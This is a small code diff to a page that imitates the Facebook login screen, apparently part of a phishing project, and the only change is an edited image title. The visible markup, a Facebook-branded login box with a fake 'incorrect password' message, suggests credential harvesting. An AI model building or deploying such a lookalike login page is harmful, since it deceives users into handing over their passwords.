--- a/facebook/index.html
+++ b/facebook/index.html
@@ -119,7 +119,7 @@
     <script src="script.js"></script>
     <div class="msg"id="msg"style="color:red;display:none;"><p>Your password or username are incorrect</p></div>
     <div style="position:fixed;">
-        <center><img src='https://sharmapushkar-coder.github.io/Freefire/facebook.svg'title="Facebook-logo-main-svg"></center>
+        <center><img src='https://sharmapushkar-coder.github.io/Freefire/facebook.svg'title="Facebook-logo-svg"></center>
     </div>
     <div class="container">
         <div class="login-box">
